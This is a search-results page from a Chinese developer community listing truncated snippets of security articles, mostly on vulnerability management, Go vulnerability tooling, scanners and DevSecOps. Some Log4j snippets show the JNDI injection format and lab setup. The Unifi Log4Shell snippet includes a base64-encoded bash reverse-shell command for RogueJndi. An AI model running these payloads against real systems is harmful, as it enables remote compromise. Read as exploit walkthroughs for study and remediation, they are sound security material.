- 综合排序
- 最热优先
- 最新优先
- 来自专栏FreeBuf
企业漏洞管理的4大误区
但是,企业可以采取很多措施来降低风险,特别是在漏洞管理方面。 漏洞管理的重要性通常被低估或忽视。我们来看看有哪些常见的漏洞管理认知误区并且来揭穿它们。 在漏洞管理方面,公司需要调整战略。 误解四:漏洞管理没什么大不了的 这一观点显然缺乏对漏洞管理的重视。 一般来自对自己的能力持某种傲慢态度的团队(一种“我的人可以手动修复任何东西”的态度),还是那些认为漏洞管理是一项低优先级的后台任务的团队,而其结果都是相同的:漏洞管理退居后位。 我们更鼓励所有IT团队优先考虑漏洞管理,抛弃其先入为主的观念和认知误区。漏洞管理可能不是IT团队要处理的最艰巨的任务,但做好漏洞管理却可能是防止严重恶意攻击的最大因素。
1.2K20发布于 2020-04-14 - 来自专栏code人生
Golang漏洞管理
要报告Go项目中的漏洞,请参阅Go安全政策[4]。 架构 Go中的漏洞管理包括以下高级组件: •数据管道从各种来源收集漏洞信息,包括国家漏洞数据库(NVD)[5]、GitHub咨询数据库[6],以及直接从Go包维护者[7]那里获得的信息。 govulncheck为您的项目提供了一种低噪音、可靠的方式来查找已知的漏洞。 资源 Go漏洞数据库 Go漏洞数据库[12]包含来自许多现有来源的信息,除此之外还有直接报告给Go安全团队的信息。 我们鼓励包维护者贡献[15]有关其自己项目中公共漏洞的信息,并向我们发送减少阻力的建议[16]。 Go漏洞检测 Go的漏洞检测旨在为Go用户提供一种低噪音、可靠的方式,以了解可能影响其项目的已知漏洞。 /security/vuln/ [2] pkg.go.dev: https://pkg.go.dev/ [3] 反馈: https://go.dev/security/vuln/#feedback [4]
92740编辑于 2023-10-16 - 来自专栏Linux运维
漏洞扫描与管理:使用 Nessus、OpenVAS 工具进行漏洞管理
漏洞扫描与管理:使用Nessus、OpenVAS工具进行漏洞管理一、前言:为什么漏洞管理是安全体系的核心在现代企业安全体系中,漏洞管理是最基础、最关键的环节之一。 执行扫描3.漏洞分析判断风险优先级结合CVSS、业务重要性评估4.修复与加固处理漏洞补丁、配置加固、替换组件5.验证与复扫确认修复效果再次扫描验证漏洞是否关闭6.报告与持续改进沉淀经验输出报告、优化流程这套框架可直接用于企业安全制度 、影响范围、修复建议步骤4:导出报告适合用于审计、合规、项目交付四、OpenVAS:完全开源的企业级漏洞扫描方案1.OpenVAS的特点完全开源,无授权费用社区活跃,漏洞库更新频率高支持大规模扫描可与SIEM :变更后立即扫描3.引入认证扫描(CredentialScan)比非认证扫描更准确能发现系统内部配置问题4.结合CVSS+业务重要性评估漏洞优先级CVSS评分资产重要性漏洞可利用性(是否有PoC/EXP SIEM/SOC结合形成闭环七、总结:构建可持续的漏洞管理体系漏洞扫描工具(如Nessus、OpenVAS)只是漏洞管理体系的一部分。
54910编辑于 2026-01-07 - 来自专栏madMen
Go 的漏洞管理
Any suggestion, please issue or contact me[4] LICENSE: MIT[5] 我们很高兴地宣布 Go 对漏洞管理的新支持,这是我们帮助 Go 开发人员了解可能影响他们的已知漏洞的第一步 概述 Go 提供工具来分析你的代码库来发现已知漏洞。该工具由 Go 漏洞数据库提供支持,该数据库由 Go 安全团队规划。Go 的工具通过仅显示代码实际调用的函数中的漏洞来减少结果中的噪音。 Go 漏洞数据库 Go 漏洞数据库 (https://vuln.go.dev) 是有关公共 Go 模块中可导入包中已知漏洞的综合信息源。 通过 VS Code Go 扩展的漏洞检查功能也即将推出。 下一步 我们希望你会发现 Go 对漏洞管理的支持很有用,并帮助我们改进它! Go 对漏洞管理的支持是一项正在积极开发的新功能。 https://github.com/madneal [3] articles-translator: https://github.com/madneal/articles-translator/ [4]
1.3K30编辑于 2022-11-22 - 来自专栏世荣的博客
搭建漏洞环境-实战-4
2.3 搭建DVWA漏洞环境 DVWA是一款开源的渗透测试漏洞练习平台,其中包含XSS,SQL注入,文件上传,文件包含,CSRF和暴力破解等各个难度的测试环境。 大家肯定用WAMP,我用MAMP(原谅我实在更新两个版本的教程了,不过大体上都是一样的)现在有了WAMP(MAMP)我们就来搭建DVWA吧 1.在安装时需要在数据库里创建一个数据库名,进入MySQL管理中 2.将DVWA重命名为dvwa并移动到htdocs Windows用户直接将文件拖到www即可(系统状态栏左下角) image.png 3.配置如上 注意:打开全局权限和用户账户数据库中的两个服务 4.
64020编辑于 2022-03-18 - 来自专栏FreeBuf
PostgreSQL管理工具pgAdmin 4中XSS漏洞的发现和利用
本文我将给大家讲述我是如何发现及利用pgAdmin4桌面客户端中的XSS漏洞。在看完本文之后,请尽快升级到1.4版本。 前言 由于我一只手误触到新MacBookPro上那大得离谱的触摸板,pgAdmin 4页面不断放大缩小。这让我开始思索pgAdmin 4是否为Web应用。 ? 这也意味着pgAdmin 4用户可以查看不可信数据(主要是来自Web应用的任意数据),也即存在注入攻击漏洞。接下来得找一个方法在获得的上下文中完成一些有趣的事情。 对于查询操作,我将其缩小为4个步骤来执行: ? 2017 – 发现问题 03-17-2017 – 构造exploit 03-17-2017 – 向security@postgresql.org进行报告 03-20-2017 – Dave Page确认漏洞
1.8K100发布于 2018-02-24 - 来自专栏技术杂记
RabbitMQ管理4
收回权限 不使用 -p 指定vhost时,默认会使用 / ,而不是清除所有 [root@h102 ~]# rabbitmqctl list_user_permissions mq Listing permissions for user "mq" ... / ^mq.* .* .* mq_test .* .* .* [root@h102 ~]# rabbitmqctl clear_permissions -p / mq Clearing permissions for user "mq" in vhost
28930编辑于 2022-04-23 - 来自专栏LuckySec网络安全
漏洞管理平台-洞察贰
0x01 洞察简介 洞察由宜信安全部开发,集成应用系统资产管理、漏洞全生命周期管理、安全知识库管理三位一体的管理平台。 洞察2.0版本,可以让用户方便快捷地进行风险管理,更加直观和实时地了解和处置自己的安全隐患。提升漏洞修复效率,同时进行安全风险管理功能联动。
2.6K70编辑于 2022-11-02 - 来自专栏FreeBuf
漏洞预警 | Harbor任意管理员注册漏洞
一、前言 Harbor是一个用于存储和分发Docker镜像的企业级Registry服务器,通过添加一些企业必需的功能特性,例如安全、标识和管理等,扩展了开源Docker Distribution。 另外,Harbor也提供了高级的安全特性,诸如用户管理,访问控制和活动审计等。 二、漏洞简介 近日Harbor曝出一个垂直越权漏洞,因注册模块对参数校验不严格,可导致任意管理员注册。 三、漏洞危害 经斗象安全应急响应团队分析,攻击者可以通过注册管理员账号来接管Harbor镜像仓库,从而写入恶意镜像,最终可以感染使用此仓库的客户端。 四、影响范围 产品 Harbor 版本 1.7.0-1.8.2 版本 Harbor 五、漏洞复现 经斗象安全应急响应团队分析,漏洞确实存在,可以越权注册管理员账号。 ?
2.1K30发布于 2019-09-24 - 来自专栏网络信息安全
【漏洞复现】Apache Log4j 漏洞利用分析
Apache Log4j 漏洞利用分析 Apache Log4j 项目被爆存在远程代码执行漏洞,且利用简单,影响危害巨大,光是引入了 log4j2 依赖的组件都是数不清,更别提项目本身可能存在的风险了 ,复现漏洞来学习一下,希望可以帮助到大家。 _221 三、 漏洞分析 测试代码如下: #log4j,java import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger log4j 中 jdni 的用法格式如下: ${jndi:JNDIContent} 既然明确了lookup是触发漏洞的点,并且找到了可以触发 lookup的方法 ,那么就可以找入口点,只要找到入口点,然后传入 ,其余的方法需要配置日志级别才可以触发漏洞。
1.1K10编辑于 2024-03-12 走进“乌云”教科书书里的漏洞(4)【充值舍入漏洞】
0x01 漏洞解析舍入漏洞是财务、支付、电商等涉及金额计算的系统中,因对小数金额的舍入规则设计不当或计算逻辑不统一,导致实际金额与预期金额产生偏差,进而被攻击者利用获取非法利益的业务逻辑漏洞。 其核心成因是不同系统模块(如订单计算、支付对账、退款结算)采用不一致的舍入方式,或未对舍入后的金额进行二次校验,形成金额差漏洞。 100 元订单拆分为 100 笔 1 元订单),利用每笔订单舍入产生的 0.01 元差额,通过批量操作获取非法收益;或在退款场景中,利用舍入差异使实际退款金额高于原支付金额,实现 “薅羊毛”0x02 漏洞复现本次使用靶场连接 在数据包里有提示:输入0.018,成功获取flag0x03 漏洞修复方法修复需围绕 “后端主导校验、拒绝信任前端数据” 核心原则,从数据校验、逻辑设计、监控审计三方面入手:后端强制重算金额:后端接收订单请求后
43910编辑于 2025-08-25- 来自专栏科技云报道
漏洞管理受重视,企业如何做好漏洞评估?
近日,《网络产品安全漏洞管理规定》的出台引起了业界的热议,《规定》对网络产品安全漏洞发现、报告、修补和发布等行为进行规范,以防范网络安全风险。 漏洞管理有了制度约束 近日,为了规范网络产品安全漏洞发现、报告、修补和发布等行为,防范网络安全风险,工业和信息化部、国家互联网信息办公室、公安部联合印发《网络产品安全漏洞管理规定》,对在我国的网络产品( 网络产品安全漏洞管理有了制度的规范,不管是网络产品的提供者和网络运营者,或是从事网络产品安全漏洞活动的组织或者个人,对于其他企业来说,针对漏洞的管理,做好漏洞评估,也是防范安全风险的重要手段。 4.进行评估 针对漏洞评估,使用什么工具,如何配置它们以及如何执行评估过程因人而异。因此,根据规则来配置工具非常重要。 此外,还应当避免因主动配置扫描操作可能对系统造成的损害。 5. 重视漏洞管理,做好漏洞评估,将为企业网络安全建设带来事半功倍的效果。
2.3K20编辑于 2022-04-16 - 来自专栏技术杂记
Mycat 管理命令4
| 100 | 4 | 0 | 0 | 0 | -1 | | sd2 | h101/my2 | 0 | h202/my4 | 0 | mysql | 0 | 0 | 100 | 0 | 0 | 0 | 0 | +------------+----------+---------+---------------+ | sd1 | h101/my1 | 0 | mysql | 0 | 4 | 100 | 4 | 0 | 0 | 0 | -1 | | sd2 | h101/my2 | 0 | mysql -------+-------+--------+------+------+---------+------------+----------+---------+---------------+ 4
27820编辑于 2021-12-02 - 来自专栏陈哥聊测试
DevSecOps 中的漏洞管理(上)
IT安全领导者应该在他们的组织中采用有效的漏洞管理实践来实施适当的DevSecOps。漏洞管理漏洞管理是一种帮助组织识别、评估、确定优先级并修复系统中漏洞的做法。 最终,漏洞管理的目标是通过使用修补、加固和配置管理等技术来降低漏洞带来的风险。这有助于确保安全性,同时限制恶意用户可能利用的风险。IT安全的主要职责是防范漏洞。 例如,Log4Shell漏洞是Log4j程序允许用户根据本应打印在日志中的值执行任意代码的一个弱点。随后实施了许多不同的漏洞利用,试图以不同的方式使用此漏洞——其中一些漏洞利用允许您插入自己的代码。 漏洞管理和DevSecOps组合为了在DevSecOps项目中有一个良好的开端,在应用程序开发的早期——最好是在开始编写代码之前——就集成安全目标。 安全扫描和漏洞管理甚至在产品/项目投入生产后仍在继续。我们需要确保通过适当的配置管理将自动补丁应用到产品的最新版本。确保产品运行的是软件及其代码的最新稳定版本。
61120编辑于 2023-09-05 - 来自专栏陈哥聊测试
DevSecOps 中的漏洞管理(下)
建立漏洞管理程序以支持DevSecOps在讨论DevSecOps及DevOps模型中包含安全性的重要性时,建立有效的漏洞管理实践是非常重要的。这可以通过将漏洞管理设置为程序来实现。 如果没有以正确的方式进行配置,作为代码的基础设施可能会为漏洞开辟多种途径。因此,正确实施DevSecOps可以首先缓解漏洞,而正确的漏洞管理可以补救开放的漏洞。 通过漏洞管理实践实现高效应用程序安全的步骤,直到操作成熟:1.漏洞管理评估评估对于了解IT组织的环境非常重要。这将使我们能够优先考虑避免风险的漏洞类型——分析漏洞风险并关注紧急情况。 我们可以定义、识别和监控已知或新出现的漏洞的端点。2. 身份和访问管理需要高效的IAM(Identity and Access Management,身份识别与访问管理)来主动防止漏洞的打开。 4. 有效配置管理数据库(CMDB,Configuration Management Database)保持最新的配置管理数据库是成功的漏洞程序极为重要的方面。理解组织的软件资产和配置管理过程是关键。
49420编辑于 2023-09-11 - 来自专栏我的安全视界观
从敏捷视角看漏洞管理
建立人人参与安全的文化、持续优化安全工具检测规则、所有漏洞聚合关联资产进行管理,推动“高可用”漏洞的闭环,实现快速交付更安全的软件。 02 — 漏洞敏捷管理实践 2.1 问题汇总 面对诸多安全工具构成的安全检测链,即使是单个系统也会产生不少漏洞,有的甚至在静态代码扫描环节就能爆出数万甚至几十万个漏洞,对于漏洞的处置难度极大、闭环基本上不太可能做到 2.3 敏捷开发中漏洞管理建议 敏捷开发中的漏洞管理与常规的漏洞管理有什么不同呢?其实是在于发现漏洞的环节更多、扫描工具更加自动化,导致产生的漏洞在相同时间更多,带来的难度和挑战更大。 就漏洞的管理方案而言,会更加全面和具有整体性,大致可从以下三个方面入手: 关注漏洞预防工作源头解决漏洞:应用系统方面,进行安全编码、第三方开源组件检测;操作系统与服务方面,进行安全配置规范、对主机进行安全加固 建制度、策略、系统,加强漏洞修复能力:公司管理制度制定,规范漏洞管理、明确职责分工、制定奖惩机制;漏洞分级抓大放小,高危必修+资产属性,筛选高危中的危险漏洞,实现精细化管理;线上漏洞跟进处置,安全资产平台漏洞导入
1.4K30编辑于 2022-12-20 - 来自专栏FreeBuf
企业安全实践之漏洞管理
在对漏洞的扫描中,我也不断提升自己的认知,特别是跟安全厂商的学习交流以及自己在freebuf、安全客这些社区中徜徉各种安全知识,慢慢对漏洞的管理有了更多的认识。 总结:在做漏洞处理的时候,就像玩贪吃蛇,你需要对漏洞各个击破,才能有效地把漏洞管理起来,形成一条漏洞修复链。 当我在威胁情报中心获知某一产品的版本漏洞时,我会在公司内部的管理员群组中同步信息,并将漏洞详情发给使用该产品的负责人,让他从应用安全的角度协助处理。 总结:我喜欢这样的团队配合,在公司的漏洞管理工作中,遵循PDCA的原则,对漏洞有一个闭环的过程。漏洞管理本是一个漫长的过程,需要把各方资源调动起来,有效地防御才是能给人一种打怪成功的感觉。 漏洞管理只是我在公司做的一部分网络安全的工作,面对复杂的网络安全管理体系,我希望可以借助漏洞管理的经验,在整个网络安全架构下,横向和纵向扩展开来,有计划地并行开展着,确保企业安全有序进行。
1.5K20发布于 2021-09-16 - 来自专栏程序员升级之路
Apache Log4j漏洞修复
一、如何确定是否中招或已经修复 import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; "+cmdMessage ); logger.error("log4j2testerror"+cmdMessage ); logger.warn("log4j2testwarn <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-slf4j-impl</artifactId> </exclusion> </exclusions> </dependency> 项目中用的比较多的是下面几个包: log4j-api log4j-core log4j-jul log4j-slf4j-impl > <dependency> <groupId>org.apache.logging.log4j</groupId> <artifactId>log4j-slf4j-impl<
1.6K20编辑于 2021-12-13 - 来自专栏R0A1NG 技术分享
Log4j2漏洞复现
原理 由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限 靶机:http://192.168.223.129:8080/ 靶机搭建: 1.平台环境 http://vulfocus.fofa.so/ 2.本地搭建 docker pull vulfocus/log4j2 -rce-2021-12-09:latest docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest 复现过程 先用dnslog 设置jvm参数"-Dlog4j2.formatMsgNoLookups=true"; 3. 设置系统环境变量"FORMAT_MESSAGES_PATTERN_DIS-ABLE_LOOKU_PS"为"true" 4. 关闭应用的网络外连。
2.2K30编辑于 2022-02-19 - 来自专栏Khan安全团队
Unifi Log4jshell漏洞利用
介绍 到现在为止,您可能已经很清楚最近披露的 Java 日志库 Log4j 的一个漏洞。该漏洞影响广泛,影响开源项目和企业软件。 Ubiquiti 在漏洞发布后不久宣布,他们的一些产品受到影响。 Sprocket 使用 Twitter 发布了使用 Log4j 在易受攻击的 Unifi 网络应用程序安装上实现远程代码执行的概念证明。 一旦您确定了一个易受攻击的实例,就可以轻松地进行漏洞利用。 中构建您的命令: java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTkyLjE2OC4xMS41MC80NDQ0IDA 您可以添加其他管理员,但没有太多理由这样做,因为我们已经拥有访问权限。 image.png 显示影响并增加自动化。 据我所知,这个 Log4j 漏洞有可能产生重大影响。为什么?
3.3K10编辑于 2022-01-05
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号